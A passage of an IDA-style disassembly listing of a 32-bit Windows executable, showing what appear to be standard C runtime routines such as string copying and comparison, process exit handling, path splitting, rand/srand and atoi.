test edx, 0FF0000h
jz short loc_40D97A
test edx, 0FF000000h
jz short loc_40D972
jmp short loc_40D939
; ---------------------------------------------------------------------------
loc_40D972: ; CODE XREF: sub_40D8B0+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40D97A: ; CODE XREF: sub_40D8B0+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_40D987: ; CODE XREF: sub_40D8B0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40D990: ; CODE XREF: sub_40D8B0+78�j
; sub_40D8B0+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_40D8B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D9A0 proc near ; CODE XREF: sub_401179+8�p
; sub_4013E5+8�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_40D9B5
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_40D9B5: ; CODE XREF: sub_40D9A0+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_40D9BA: ; CODE XREF: sub_40D9A0+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40D9BA
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_40D9A0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40D9DD proc near ; CODE XREF: sub_4012BA+120�p
; sub_40151D+120�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_40DAB6
test al, 40h
jnz loc_40DAB6
test al, 2
jz short loc_40DA04
or eax, 20h
mov [esi+0Ch], eax
jmp loc_40DAB6
; ---------------------------------------------------------------------------
loc_40DA04: ; CODE XREF: sub_40D9DD+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_40DA19
push esi
call sub_4106EF
pop ecx
jmp short loc_40DA1E
; ---------------------------------------------------------------------------
loc_40DA19: ; CODE XREF: sub_40D9DD+31�j
mov eax, [esi+8]
mov [esi], eax
loc_40DA1E: ; CODE XREF: sub_40D9DD+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41050F
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_40DAA5
cmp eax, 0FFFFFFFFh
jz short loc_40DAA5
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_40DA7A
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_40DA60
mov edi, ecx
sar edi, 5
mov edi, dword_4C5DC0[edi*4]
and ecx, 1Fh
lea edi, [edi+ecx*8]
jmp short loc_40DA65
; ---------------------------------------------------------------------------
loc_40DA60: ; CODE XREF: sub_40D9DD+6D�j
mov edi, offset dword_421260
loc_40DA65: ; CODE XREF: sub_40D9DD+81�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_40DA7A
or edx, 2000h
mov [esi+0Ch], edx
loc_40DA7A: ; CODE XREF: sub_40D9DD+64�j
; sub_40D9DD+92�j
cmp dword ptr [esi+18h], 200h
jnz short loc_40DA97
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_40DA97
test ch, 4
jnz short loc_40DA97
mov dword ptr [esi+18h], 1000h
loc_40DA97: ; CODE XREF: sub_40D9DD+A4�j
; sub_40D9DD+AC�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DAA5: ; CODE XREF: sub_40D9DD+57�j
; sub_40D9DD+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_40DAB6: ; CODE XREF: sub_40D9DD+A�j
; sub_40D9DD+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_40D9DD endp
; =============== S U B R O U T I N E =======================================
sub_40DABB proc near ; DATA XREF: .text:0041E014�o
mov eax, dword_4C6EE0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40DACF
mov eax, 200h
jmp short loc_40DAD5
; ---------------------------------------------------------------------------
loc_40DACF: ; CODE XREF: sub_40DABB+B�j
cmp eax, esi
jge short loc_40DADA
mov eax, esi
loc_40DAD5: ; CODE XREF: sub_40DABB+12�j
mov dword_4C6EE0, eax
loc_40DADA: ; CODE XREF: sub_40DABB+16�j
push 4
push eax
call sub_410733
test eax, eax
pop ecx
pop ecx
mov dword_4C5ED4, eax
jnz short loc_40DB0B
push 4
push esi
mov dword_4C6EE0, esi
call sub_410733
test eax, eax
pop ecx
pop ecx
mov dword_4C5ED4, eax
jnz short loc_40DB0B
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DB0B: ; CODE XREF: sub_40DABB+30�j
; sub_40DABB+49�j
xor edx, edx
mov ecx, offset off_420F80
jmp short loc_40DB19
; ---------------------------------------------------------------------------
loc_40DB14: ; CODE XREF: sub_40DABB+6D�j
mov eax, dword_4C5ED4
loc_40DB19: ; CODE XREF: sub_40DABB+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_421200
jl short loc_40DB14
xor edx, edx
mov ecx, offset dword_420F90
loc_40DB31: ; CODE XREF: sub_40DABB+A0�j
mov eax, edx
sar eax, 5
mov eax, dword_4C5DC0[eax*4]
mov esi, edx
and esi, 1Fh
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_40DB4E
test eax, eax
jnz short loc_40DB51
loc_40DB4E: ; CODE XREF: sub_40DABB+8D�j
or dword ptr [ecx], 0FFFFFFFFh
loc_40DB51: ; CODE XREF: sub_40DABB+91�j
add ecx, 20h
inc edx
cmp ecx, offset dword_420FF0
jl short loc_40DB31
xor eax, eax
pop esi
retn
sub_40DABB endp
; =============== S U B R O U T I N E =======================================
sub_40DB61 proc near ; DATA XREF: .text:0041E030�o
; FUNCTION CHUNK AT 004107AE SIZE 00000058 BYTES
call sub_41090B
cmp byte_4C5948, 0
jz short locret_40DB74
jmp loc_4107AE
; ---------------------------------------------------------------------------
locret_40DB74: ; CODE XREF: sub_40DB61+C�j
retn
sub_40DB61 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40DB80 proc near ; CODE XREF: sub_401648+2B�p
; sub_401822+49�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_40DC1F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40DBAC
shr ecx, 2
jnz loc_40DC2F
jmp short loc_40DBD3
; ---------------------------------------------------------------------------
loc_40DBAC: ; CODE XREF: sub_40DB80+1F�j
; sub_40DB80+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_40DBE6
test al, al
jz short loc_40DBEE
test esi, 3
jnz short loc_40DBAC
mov ebx, ecx
shr ecx, 2
jnz short loc_40DC2F
loc_40DBCE: ; CODE XREF: sub_40DB80+AD�j
and ebx, 3
jz short loc_40DBE6
loc_40DBD3: ; CODE XREF: sub_40DB80+2A�j
; sub_40DB80+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_40DC18
sub ebx, 1
jnz short loc_40DBD3
loc_40DBE6: ; CODE XREF: sub_40DB80+39�j
; sub_40DB80+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40DBEE: ; CODE XREF: sub_40DB80+3D�j
test edi, 3
jz short loc_40DC0C
loc_40DBF6: ; CODE XREF: sub_40DB80+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_40DC9C
test edi, 3
jnz short loc_40DBF6
loc_40DC0C: ; CODE XREF: sub_40DB80+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_40DC87
loc_40DC13: ; CODE XREF: sub_40DB80+9B�j
; sub_40DB80+116�j
mov [edi], al
add edi, 1
loc_40DC18: ; CODE XREF: sub_40DB80+5F�j
sub ebx, 1
jnz short loc_40DC13
pop ebx
pop esi
loc_40DC1F: ; CODE XREF: sub_40DB80+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40DC25: ; CODE XREF: sub_40DB80+C7�j
; sub_40DB80+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_40DBCE
loc_40DC2F: ; CODE XREF: sub_40DB80+24�j
; sub_40DB80+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_40DC25
test dl, dl
jz short loc_40DC79
test dh, dh
jz short loc_40DC6F
test edx, 0FF0000h
jz short loc_40DC65
test edx, 0FF000000h
jnz short loc_40DC25
mov [edi], edx
jmp short loc_40DC7D
; ---------------------------------------------------------------------------
loc_40DC65: ; CODE XREF: sub_40DB80+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_40DC7D
; ---------------------------------------------------------------------------
loc_40DC6F: ; CODE XREF: sub_40DB80+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_40DC7D
; ---------------------------------------------------------------------------
loc_40DC79: ; CODE XREF: sub_40DB80+CB�j
xor edx, edx
mov [edi], edx
loc_40DC7D: ; CODE XREF: sub_40DB80+E3�j
; sub_40DB80+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_40DC93
loc_40DC87: ; CODE XREF: sub_40DB80+91�j
xor eax, eax
loc_40DC89: ; CODE XREF: sub_40DB80+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_40DC89
loc_40DC93: ; CODE XREF: sub_40DB80+105�j
and ebx, 3
jnz loc_40DC13
loc_40DC9C: ; CODE XREF: sub_40DB80+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_40DB80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCA4 proc near ; CODE XREF: sub_40198E+1B3B�p
; sub_40198E+2973�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_40D630
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_41095C
add esp, 10h
leave
retn
sub_40DCA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCE0 proc near ; CODE XREF: sub_40198E+1AB8�p
; sub_40198E+1ADE�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_40DD07
xor eax, eax
jmp short loc_40DD09
; ---------------------------------------------------------------------------
loc_40DD07: ; CODE XREF: sub_40DCE0+21�j
mov eax, edi
loc_40DD09: ; CODE XREF: sub_40DCE0+25�j
cld
pop edi
leave
retn
sub_40DCE0 endp
; =============== S U B R O U T I N E =======================================
sub_40DD0D proc near ; CODE XREF: sub_40DDA2+BA�p
; .text:0040F93E�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call dword_419094 ; GetModuleHandleA
test eax, eax
jz short loc_40DD32
push offset aCorexitprocess ; "CorExitProcess"
push eax
call dword_4190F8 ; GetProcAddress
test eax, eax
jz short loc_40DD32
push [esp+arg_0]
call eax ; dword_41E038
loc_40DD32: ; CODE XREF: sub_40DD0D+D�j
; sub_40DD0D+1D�j
push [esp+arg_0]
call dword_4190B8 ; ExitProcess
int 3 ; Trap to Debugger
loc_40DD3D: ; CODE XREF: .text:loc_40F995�p
mov eax, off_421218
test eax, eax
jz short loc_40DD48
call eax ; sub_40E2CA
loc_40DD48: ; CODE XREF: sub_40DD0D+37�j
push esi
push edi
mov ecx, offset dword_41E010
mov edi, offset dword_41E028
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_40DD73
loc_40DD5C: ; CODE XREF: sub_40DD0D+60�j
test eax, eax
jnz short loc_40DD9F
mov ecx, [esi]
test ecx, ecx
jz short loc_40DD68
call ecx
loc_40DD68: ; CODE XREF: sub_40DD0D+57�j
add esi, 4
cmp esi, edi
jb short loc_40DD5C
test eax, eax
jnz short loc_40DD9F
loc_40DD73: ; CODE XREF: sub_40DD0D+4D�j
push offset loc_4115F6
call sub_411578
mov esi, offset dword_41E000
mov eax, esi
mov edi, offset dword_41E00C
cmp eax, edi
pop ecx
jnb short loc_40DD9D
loc_40DD8E: ; CODE XREF: sub_40DD0D+8E�j
mov eax, [esi]
test eax, eax
jz short loc_40DD96
call eax
loc_40DD96: ; CODE XREF: sub_40DD0D+85�j
add esi, 4
cmp esi, edi
jb short loc_40DD8E
loc_40DD9D: ; CODE XREF: sub_40DD0D+7F�j
xor eax, eax
loc_40DD9F: ; CODE XREF: sub_40DD0D+51�j
; sub_40DD0D+64�j
pop edi
pop esi
retn
sub_40DD0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDA2 proc near ; CODE XREF: sub_40DE64+8�p
; sub_40DE75+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
inc esi
cmp dword_4C5950, esi
push edi
jnz short loc_40DDC2
push [ebp+arg_0]
call dword_4190F4 ; GetCurrentProcess
push eax
call dword_419070 ; TerminateProcess
loc_40DDC2: ; CODE XREF: sub_40DDA2+E�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_4C594C, esi
mov byte_4C5948, al
jnz short loc_40DE28
mov ecx, dword_4C5ECC
test ecx, ecx
jz short loc_40DE09
mov eax, dword_4C5EC8
sub eax, 4
cmp eax, ecx
jmp short loc_40DE02
; ---------------------------------------------------------------------------
loc_40DDEC: ; CODE XREF: sub_40DDA2+65�j
mov eax, [eax]
test eax, eax
jz short loc_40DDF4
call eax
loc_40DDF4: ; CODE XREF: sub_40DDA2+4E�j
mov eax, dword_4C5EC8
sub eax, 4
cmp eax, dword_4C5ECC
loc_40DE02: ; CODE XREF: sub_40DDA2+48�j
mov dword_4C5EC8, eax
jnb short loc_40DDEC
loc_40DE09: ; CODE XREF: sub_40DDA2+3C�j
mov eax, offset dword_41E02C
mov esi, offset dword_41E034
cmp eax, esi
mov edi, eax
jnb short loc_40DE28
loc_40DE19: ; CODE XREF: sub_40DDA2+84�j
mov eax, [edi]
test eax, eax
jz short loc_40DE21
call eax
loc_40DE21: ; CODE XREF: sub_40DDA2+7B�j
add edi, 4
cmp edi, esi
jb short loc_40DE19
loc_40DE28: ; CODE XREF: sub_40DDA2+32�j
; sub_40DDA2+75�j
mov eax, offset dword_41E038
mov esi, offset dword_41E040
cmp eax, esi
mov edi, eax
jnb short loc_40DE47
loc_40DE38: ; CODE XREF: sub_40DDA2+A3�j
mov eax, [edi]
test eax, eax
jz short loc_40DE40
call eax
loc_40DE40: ; CODE XREF: sub_40DDA2+9A�j
add edi, 4
cmp edi, esi
jb short loc_40DE38
loc_40DE47: ; CODE XREF: sub_40DDA2+94�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jnz short loc_40DE62
push [ebp+arg_0]
mov dword_4C5950, 1
call sub_40DD0D
pop ecx
loc_40DE62: ; CODE XREF: sub_40DDA2+AB�j
pop ebp
retn
sub_40DDA2 endp
; =============== S U B R O U T I N E =======================================
sub_40DE64 proc near ; CODE XREF: sub_40198E+150B�p
; .text:0040F9E5�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_40DDA2
add esp, 0Ch
retn
sub_40DE64 endp
; =============== S U B R O U T I N E =======================================
sub_40DE75 proc near ; CODE XREF: sub_40F82D+1C�p
; .text:0040FA12�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_40DDA2
add esp, 0Ch
retn
sub_40DE75 endp
; =============== S U B R O U T I N E =======================================
sub_40DE86 proc near ; CODE XREF: .text:loc_40F9EA�p
push 1
push 0
push 0
call sub_40DDA2
add esp, 0Ch
retn
sub_40DE86 endp
; =============== S U B R O U T I N E =======================================
sub_40DE95 proc near ; CODE XREF: .text:loc_40FA17�p
push 1
push 1
push 0
call sub_40DDA2
add esp, 0Ch
retn
sub_40DE95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DEA4 proc near ; CODE XREF: sub_40198E+1065�p
; sub_404BAB+16E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_40D630
cmp eax, 1
pop ecx
jb short loc_40DEE0
cmp byte ptr [ebx+1], 3Ah
jnz short loc_40DEE0
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_40DEDC
push 2
push ebx
push esi
call sub_411A2E
add esp, 0Ch
and byte ptr [esi+2], 0
loc_40DEDC: ; CODE XREF: sub_40DEA4+26�j
inc ebx
inc ebx
jmp short loc_40DEEA
; ---------------------------------------------------------------------------
loc_40DEE0: ; CODE XREF: sub_40DEA4+19�j
; sub_40DEA4+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_40DEEA
and byte ptr [eax], 0
loc_40DEEA: ; CODE XREF: sub_40DEA4+3A�j
; sub_40DEA4+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_40DF62
loc_40DEFD: ; CODE XREF: sub_40DEA4+88�j
mov cl, [eax]
movzx edx, cl
test byte_4C5B81[edx], 4
jz short loc_40DF0E
inc eax
jmp short loc_40DF28
; ---------------------------------------------------------------------------
loc_40DF0E: ; CODE XREF: sub_40DEA4+65�j
cmp cl, 2Fh
jz short loc_40DF22
cmp cl, 5Ch
jz short loc_40DF22
cmp cl, 2Eh
jnz short loc_40DF28
mov [ebp+var_4], eax
jmp short loc_40DF28
; ---------------------------------------------------------------------------
loc_40DF22: ; CODE XREF: sub_40DEA4+6D�j
; sub_40DEA4+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_40DF28: ; CODE XREF: sub_40DEA4+68�j
; sub_40DEA4+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_40DEFD
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_40DF62
cmp [ebp+arg_8], 0
jz short loc_40DF5D
sub edi, ebx
cmp edi, esi
jb short loc_40DF46
mov edi, esi
loc_40DF46: ; CODE XREF: sub_40DEA4+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_411A2E
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_40DF5D: ; CODE XREF: sub_40DEA4+98�j
mov ebx, [ebp+arg_0]
jmp short loc_40DF6C
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40DEA4+57�j
; sub_40DEA4+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_40DF6C
and byte ptr [ecx], 0
loc_40DF6C: ; CODE XREF: sub_40DEA4+BC�j
; sub_40DEA4+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_40DFBF
cmp edi, ebx
jb short loc_40DFBF
cmp [ebp+arg_C], 0
jz short loc_40DF9C
sub edi, ebx
cmp edi, esi
jb short loc_40DF85
mov edi, esi
loc_40DF85: ; CODE XREF: sub_40DEA4+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_411A2E
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_40DF9C: ; CODE XREF: sub_40DEA4+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_40DFE7
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_40DFAC
mov esi, eax
loc_40DFAC: ; CODE XREF: sub_40DEA4+104�j
push esi
push [ebp+var_4]
push edi
call sub_411A2E
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_40DFE7
; ---------------------------------------------------------------------------
loc_40DFBF: ; CODE XREF: sub_40DEA4+CD�j
; sub_40DEA4+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_40DFDD
sub eax, ebx
cmp eax, esi
jnb short loc_40DFCE
mov esi, eax
loc_40DFCE: ; CODE XREF: sub_40DEA4+126�j
push esi
push ebx
push edi
call sub_411A2E
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_40DFDD: ; CODE XREF: sub_40DEA4+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_40DFE7
and byte ptr [eax], 0
loc_40DFE7: ; CODE XREF: sub_40DEA4+FD�j
; sub_40DEA4+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40DEA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFEC proc near ; CODE XREF: sub_40198E+EEB�p
; sub_40198E+10B3�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_40FBCF
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_40E03D
dec [ebp+var_1C]
js short loc_40E030
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_40E03D
; ---------------------------------------------------------------------------
loc_40E030: ; CODE XREF: sub_40DFEC+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_40FA2B
pop ecx
pop ecx
loc_40E03D: ; CODE XREF: sub_40DFEC+35�j
; sub_40DFEC+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40DFEC endp
; =============== S U B R O U T I N E =======================================
sub_40E043 proc near ; CODE XREF: sub_409C44+A�p
; .text:00409E7D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_421200, eax
retn
sub_40E043 endp
; =============== S U B R O U T I N E =======================================
sub_40E04D proc near ; CODE XREF: sub_40198E:loc_402531�p
; sub_40198E+1B43�p ...
mov eax, dword_421200
imul eax, 343FDh
add eax, 269EC3h
mov dword_421200, eax
xor eax, eax
mov ax, word ptr dword_421200+2
and eax, 7FFFh
retn
sub_40E04D endp
; =============== S U B R O U T I N E =======================================
sub_40E070 proc near ; CODE XREF: sub_40E0C8�j
; sub_415FE6+36�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_40E078
; ---------------------------------------------------------------------------
loc_40E077: ; CODE XREF: sub_40E070+14�j
inc esi
loc_40E078: ; CODE XREF: sub_40E070+5�j
movzx eax, byte ptr [esi]
push eax
call sub_411AAF
test eax, eax
pop ecx
jnz short loc_40E077
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_40E096
cmp ecx, 2Bh
jnz short loc_40E09A
loc_40E096: ; CODE XREF: sub_40E070+1F�j
movzx ecx, byte ptr [esi]
inc esi
loc_40E09A: ; CODE XREF: sub_40E070+24�j
xor eax, eax
loc_40E09C: ; CODE XREF: sub_40E070+4D�j
cmp ecx, 30h
jl short loc_40E0AB
cmp ecx, 39h
jg short loc_40E0AB
sub ecx, 30h
jmp short loc_40E0AE
; ---------------------------------------------------------------------------
loc_40E0AB: ; CODE XREF: sub_40E070+2F�j
; sub_40E070+34�j
or ecx, 0FFFFFFFFh
loc_40E0AE: ; CODE XREF: sub_40E070+39�j
cmp ecx, 0FFFFFFFFh
jz short loc_40E0BF
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_40E09C
; ---------------------------------------------------------------------------
loc_40E0BF: ; CODE XREF: sub_40E070+41�j
cmp edx, 2Dh
pop esi
jnz short locret_40E0C7
neg eax
locret_40E0C7: ; CODE XREF: sub_40E070+53�j
retn
sub_40E070 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E0C8 proc near ; CODE XREF: sub_40198E+B8A�p
; sub_40198E+B98�p ...
jmp sub_40E070
sub_40E0C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E0D0 proc near ; CODE XREF: sub_40198E+7C1�p
; sub_40198E+7D4�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_40E102
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_40E100
jz short loc_40E102
sub ecx, 2
loc_40E100: ; CODE XREF: sub_40E0D0+29�j
not ecx
loc_40E102: ; CODE XREF: sub_40E0D0+9�j
; sub_40E0D0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_40E0D0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_40E120
loc_40E110: ; CODE XREF: sub_40E120+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_40E120
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40E120 proc near ; CODE XREF: sub_40198E+4B7�p
; sub_40198E+2923�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0040E110 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_40E126: ; CODE XREF: sub_40D810+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40E14D
loc_40E138: ; CODE XREF: sub_40E120+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_40E110
test cl, cl
jz short loc_40E196
test edx, 3
jnz short loc_40E138
loc_40E14D: ; CODE XREF: sub_40E120+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_40E158: ; CODE XREF: sub_40E120+63�j
; sub_40E120+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_40E19A
and eax, 81010100h
jz short loc_40E158
and eax, 1010100h
jnz short loc_40E194
and esi, 80000000h
jnz short loc_40E158
loc_40E194: ; CODE XREF: sub_40E120+6A�j
; sub_40E120+83�j ...
pop esi
pop edi
loc_40E196: ; CODE XREF: sub_40E120+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40E19A: ; CODE XREF: sub_40E120+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_40E1D7
test al, al
jz short loc_40E194
cmp ah, bl
jz short loc_40E1D0
test ah, ah
jz short loc_40E194
shr eax, 10h
cmp al, bl
jz short loc_40E1C9
test al, al
jz short loc_40E194
cmp ah, bl
jz short loc_40E1C2
test ah, ah
jz short loc_40E194
jmp short loc_40E158
; ---------------------------------------------------------------------------
loc_40E1C2: ; CODE XREF: sub_40E120+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40E1C9: ; CODE XREF: sub_40E120+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40E1D0: ; CODE XREF: sub_40E120+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40E1D7: ; CODE XREF: sub_40E120+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_40E120 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E1DE proc near ; CODE XREF: sub_40198E+AA�p
